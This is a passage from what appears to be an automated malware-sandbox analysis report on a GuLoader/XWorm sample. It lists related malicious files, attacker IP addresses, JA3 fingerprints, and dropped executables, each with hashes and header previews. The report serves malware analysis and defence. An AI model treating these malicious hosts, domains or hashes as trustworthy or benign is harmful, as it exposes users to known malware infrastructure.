                                                                      file.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 69.31.136.17
                                                                      windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                      • 69.31.136.17
                                                                      windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.57
                                                                      file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 69.31.136.57
                                                                      update.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 69.31.136.57
                                                                      time.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 69.31.136.53
                                                                      http://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                                                      • 69.167.127.106
                                                                      http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                                      • 69.167.127.106

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eDoc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      upload.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      file.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      https://atualizar-cmd.com/Get hashmaliciousUnknownBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      update.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      file.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.17
                                                                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      upload.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      file.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      update.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57
                                                                      file.vbsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.28.80
                                                                      • 69.31.136.57

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Program Files (x86)\AutoIt3\Au3Info.exe1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                            C:\Program Files (x86)\AutoIt3\Au3Check.exe1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse

                                                                              Created / dropped Files

                                                                              C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):275560
                                                                              Entropy (8bit):6.100887295483481
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkkP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvOIXM:/4VQjVsxyItKQNhigibKCM
                                                                              MD5:AA874F4DC4061965993D91D3B5FC3639
                                                                              SHA1:9A35E342D18389963F6F13555913597EB6CBC59C
                                                                              SHA-256:07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
                                                                              SHA-512:FBD1F63321327AB227C25E88F9CD47FF713D452E526A3CAF892A008034EAC5F2A1E95C4B21F54372AC95F679C2C82EA31EC5883B81ABF1190AD949F1B4615961
                                                                              Malicious:true
                                                                              Joe Sandbox View:
                                                                              • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):217704
                                                                              Entropy (8bit):6.356771671512563
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk3xFVaK4T6fWSlXe0lJQafeyrR0kr/yh5DEU/Pk13TfwqiTP0McBUNnUxTtd4N:y2K4TSFo5Y683TdiQMcGNUl4N
                                                                              MD5:0576F2AD6C31F9F557B9166A4E5B1CDE
                                                                              SHA1:AA825C3A13A9528B2CE553B3CAB4DA4407CAEDF5
                                                                              SHA-256:6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
                                                                              SHA-512:D923411444B35DB3FEF062CBE129CC68FFFB4D8391185B94B93988DF76D6013158245164B837B4C86C529E9CF9848827EE7E564A521255D5A99F1B19F156AD4B
                                                                              Malicious:true
                                                                              Joe Sandbox View:
                                                                              • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):237160
                                                                              Entropy (8bit):6.19362218837873
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkMyRnuBGwl/1Gc9QnvGqyWQ93kr/yh5DEU/P5kP0zU35iuvQBUeGMLu:4l3wdYtcH9b5Y651zU77Ea
                                                                              MD5:6F302C0AA579B094CBE24E5B4DBD6D47
                                                                              SHA1:35C560D585FB0308949C02F8EC53DA22C7FA19AD
                                                                              SHA-256:4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
                                                                              SHA-512:3817838FCEBEEF09CA3001B0B338CFF8BB74C42B73F2618016FC8294249609FA6CD65C955326D641E90F7DB74AEB00F90F6F3267A3071752BD2896A411513940
                                                                              Malicious:true
                                                                              Joe Sandbox View:
                                                                              • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1675872
                                                                              Entropy (8bit):7.428945763224762
                                                                              Encrypted:false
                                                                              SSDEEP:24576:NC51xB6B9YNgqe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+l:yK0eqkSR7Xgo4TiRPnLWvJY
                                                                              MD5:61D6FED123118E8EE0BC42F1C0762E72
                                                                              SHA1:F661A58070F467E80BA7592DDC3BB3ECE235A536
                                                                              SHA-256:2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
                                                                              SHA-512:2F0AE53557FAA193853E8646663F96A64BD17A078208ADBDD8FC6022002AB7F7D63EDD75FC9D44ADC1D5C744DC38CA16896A7DB381179685F04E6E59089144DB
                                                                              Malicious:true
                                                                              Joe Sandbox View:
                                                                              • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1841760
                                                                              Entropy (8bit):7.32243413749646
                                                                              Encrypted:false
                                                                              SSDEEP:24576:LEeK2NocwiN/jc41p3qp11JsqbhOUe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+i:ZfYP1JsEDkSR7Xgo4TiRPnLWvJD
                                                                              MD5:783C051072E1D238DA994E95DABCBF6E
                                                                              SHA1:1CB52C65962C8DD150B5ED7172631E14824A5102
                                                                              SHA-256:C61EA0A64369DB217167BECC7A4D01AC2C97FA1D8CAD43189DCBEDD7F0142557
                                                                              SHA-512:16ED187A7BB9AEA9278ADB0C43EF4B5A4D58228A4B66441377CFF5EDBAA4A84220AC0E7760DE606DBFA4672E82D99C6242FEC59946B33C1DBD4328DCB573EF5D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):346624
                                                                              Entropy (8bit):7.791635057531845
                                                                              Encrypted:false
                                                                              SSDEEP:6144:LpXDXz7yIrozs0WuNd3ojusBdgnNW6r4F53ttuGENGFdVCLEYnPO1D7YYoSyZCWz:L9zGImAjJdcH4j3ttzFdVCLNSfHoSWCG
                                                                              MD5:B54F778BABB81D6C30BFA202F89EEE0D
                                                                              SHA1:3D027D339CC635F6BA046CB90B041877CF562162
                                                                              SHA-256:6090BBD5F090319967C17CDC4E2465EB8A680EE84647E863451B9B51453EE8AF
                                                                              SHA-512:0B39C94016120EE7FE21DD9D1DC41AFB61330DAE90362F14F97A716304311EAD9D6BFFC44DD70C8B596802DAE6FF8F94504A3C56C6BE1914C1435CBEBBDA24EE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):165976
                                                                              Entropy (8bit):5.7704448291370625
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk3okvQ4gXIRSG+7IJqC3CJyoDjpBnjkP0XGx2SYg+b/Q+y1s3:pnGZLknnj1X62SYdb4I
                                                                              MD5:6C5024852E53944BC5E619032E91EE75
                                                                              SHA1:F3AF98C27CE37CF0157871DF3C376052F8F9312A
                                                                              SHA-256:13AE96DD7EEA7B543FBF94CF173E0BAFB62C6604816D0C975DF0332E49F84582
                                                                              SHA-512:84D6C4FACB7478128121755E024249599B1B0F71CDF1CD1A11CD6AE53C982367511ADCF8FA97021AEEBF01EFD9FA86051C8CF371D21153087F775069C792187F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1113176
                                                                              Entropy (8bit):6.40004020826486
                                                                              Encrypted:false
                                                                              SSDEEP:24576:2TC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBg:2+6AqSPyC+NltpScpzbtvpJoMQSq/jrL
                                                                              MD5:42A434581A9BB44B8530A921550CF17E
                                                                              SHA1:3E0078F0BA260036000968579F58BCCDBCD61769
                                                                              SHA-256:67CEA6E433605652DA3BC35A75C9DE5222DFBEA9F063744037CD79BFF516D84E
                                                                              SHA-512:9E391F0D8B059413373B68BBD5D0D2AD1B6397C238D2D26D32CAC1AA15CCD3202F514330967722F91DA4E7BA550D5892CFF4DA63B1EB6A66A14C9C463F66A1DB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2414080
                                                                              Entropy (8bit):6.710317121419989
                                                                              Encrypted:false
                                                                              SSDEEP:49152:h0GSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL8:e4OEtwiICvYMpfc
                                                                              MD5:A24DA8C79D1B52417FFE52CC6A36A43A
                                                                              SHA1:141012704D8BE413B7D7BF129B184764B7439179
                                                                              SHA-256:1EB0A26BC91C6AA08A426DDDFF8615E5A0D374E9AC6E89FF0C2EB0C73763A913
                                                                              SHA-512:669911D738DA068785CBE44F2D8FB92AD18F08E7A8418EAF549E93D6DEC816F7242D71E3EA1A5F89FA3685E9415630E38FE4059D6B296148CF340A94AD662EEB
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\AutoIt3\Uninstall.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):113233
                                                                              Entropy (8bit):6.280496469967927
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VofCrNGqLtZnMjbPmsAYBdTU9fEAIS2PEtuGCrK:/rkACrNGEtajbefY/TU9fE9PEtuGCrK
                                                                              MD5:72C8B1DC3E7AEAD3B804FB784C9202DF
                                                                              SHA1:5FDA23CBB7C3E82A938CE412C3C1574B1FB6350F
                                                                              SHA-256:2CF1A48566846598E7134EB1F5E402937E1E0F4EDB4B522D2CB44681076882B2
                                                                              SHA-512:DD5E57335DEA15FDC81198636D7ACFF27B49A8D0C50BBC8B26E3106A149D9889E1DDABB277CFA8279204B82155111DDE933E64203C5715D290017F9BBD169914
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):409608
                                                                              Entropy (8bit):6.339039046737096
                                                                              Encrypted:false
                                                                              SSDEEP:6144:UvqF1Ged2RYbguEuFuTkdj+zRGa7JkjrXyPyMMWvpBVOaqahUqjAGT:xbgvuFuQdj+zRTJkX8yMhB3jhBAi
                                                                              MD5:8D0A97059A190F777B425ECF1E8E9442
                                                                              SHA1:C450D9422A0DB8C39A274C1F3EBB2255A4D40E03
                                                                              SHA-256:029089E37E60DA6EE61E08C9C92E0FC48DE78D3FF53A566A71FB9795359E0196
                                                                              SHA-512:609093002FB13CD8776BAC599EC0E3D999F4BB71DC3128834A3E5A7642E85BF0B694A834E898B6A0614F4B0E2F3A7A87D99030DB7677DBC55F140079CB304C19
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):214512
                                                                              Entropy (8bit):6.242999725098675
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkfGnUI/9FXK4+PoSZSb5qURwubvvnzdl1CkTlxAenDl3SoxceC76JNKjzDI5:KGUcsvZZvUmubv7hTHA8l3yROJyDI5
                                                                              MD5:D90DDA30DA5ED08959042648374D9153
                                                                              SHA1:37FD707B384D7684584D6D6B45FC75EDA02FFFBF
                                                                              SHA-256:F01F16359CC5BEAAC9A59BDAAA78BBB172F5B852875FDCC7CDB90C10F6AC22AF
                                                                              SHA-512:C27C0493D611882BE6FA63C3A3AD1B0FBDA7F2D4FDCDB0DCAB363DA3FEA78AA1814DAF31A86EF3064B39B20F0E41E87A851E506F54D89C47E856923E8788EC5B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):568400
                                                                              Entropy (8bit):6.589660608389939
                                                                              Encrypted:false
                                                                              SSDEEP:12288:TyvTCXdXikLj2jR7trg6Qi3vYsKTU00vq:TyyLj8trn3wsq0vq
                                                                              MD5:267DDE27EAF6950E8CA2FAB44777A6A1
                                                                              SHA1:940CD4BFA9B26FD75B23799055124DBE7AEC548A
                                                                              SHA-256:7B7F7DF16EC41961DAEC3DCE736D6127F9ABA03779BEC8B65EA24553FD1B52DA
                                                                              SHA-512:1FB1A1CB24D549539F87CDDAEC0F54DF66B7DC3C1C9C0BDAA8DED690AC722F846380D034422110F52F171D5148C78B745D4FC88C6B98A23F3CFE064CE2CDFBD9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1252432
                                                                              Entropy (8bit):6.722333632620241
                                                                              Encrypted:false
                                                                              SSDEEP:24576:j0n7Ubxk/uRvJqLGJLQ4a56duA/85RkV4l7/ZeoMOp:o4iwwGJra0uAUfkVy7/ZX
                                                                              MD5:807BDA887A05224A70C5F1AF88260DC0
                                                                              SHA1:40730E1667845DF510113D6A477BEDC0ACEE36CB
                                                                              SHA-256:72AD734C38933328D519289803AD0B298949FD607A90DBB31D6D04CE39514A90
                                                                              SHA-512:4BD27971FE05BAE431C2EF948265F457DB368331860B6DDB5C96F6DF5BB09F5548C737315EA2D7ECBF81E3E8885AF26D61ED95F4C050DFD8BE833ABD06733BB9
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):790096
                                                                              Entropy (8bit):6.685520086044301
                                                                              Encrypted:false
                                                                              SSDEEP:12288:lMvcR0D0B6PyxoxIlZwM+R6R4uFjs1Z7FMN0TzJqccvbXkN58AuimIh:dR0gB6axoCfyR6RLQRF/TzJqe58BimIh
                                                                              MD5:611DE7B526AD3AD4E09E47C1B86367D9
                                                                              SHA1:583621B2438FAF2B485C7D4FBEF403747CD57EEF
                                                                              SHA-256:A62D1854968811331942010168652BB4C33F2EAC89067A91AA70F16D711FE2E2
                                                                              SHA-512:04296781297F2F306E0DF63EDD314979DD37EBAF334D6E58DE9DA8BA095C3BA8210E8A4A4EFBB8A51CEC06B9DE12B659F431056648558C792A80D167DE975728
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):562776
                                                                              Entropy (8bit):6.325980130189127
                                                                              Encrypted:false
                                                                              SSDEEP:6144:s0dzerObMhDGJ9UM3sunrXj9BMHmD1tYFLqY/W5R02qO7VKCy7KCzDSEBPj:beqbWqB3sunrT9+aYFLq3ny7JSEBPj
                                                                              MD5:ADA3590FA13D77AF34248A7A04D577C4
                                                                              SHA1:5016D3685BB6571982250A3B8414BB002408CB32
                                                                              SHA-256:6CDB640EE5BDA123CFEF08A8E423851C050CEA0784ECB9BFEF50D07C17F01A5A
                                                                              SHA-512:669E54F4C248B265DC8C422E642B79DB44C60051F7782258A9B8A0725170E7229CE4BFD48F5980BD6C099096F7DE91B3ADDE32D6098D099B5BF2CC5FDB0DD426
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):127512
                                                                              Entropy (8bit):5.882565985204679
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkQPo10JOSdnvEhEyr1hg9uCRFRzsxeZ:ng1MOc81hmRFJs0Z
                                                                              MD5:2410DBD92B226D1A105A7DD336B7E89B
                                                                              SHA1:4A75AE111CC58ED86D157D69C139AEE5D5753B3D
                                                                              SHA-256:87102C0F0150FDF75EF59A2E9B83BF9FD5A82A333AEBA3E64FF0CEBF1C9CE326
                                                                              SHA-512:96BB8E23F7A78FE9E335A3AB17B78F6B33D85E6EAC34CD8096EC7C98EAA3B1233442566903A56F6DE0CAD915EC097CC9146F7E43D0DEC1E31AFA2F193020212F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
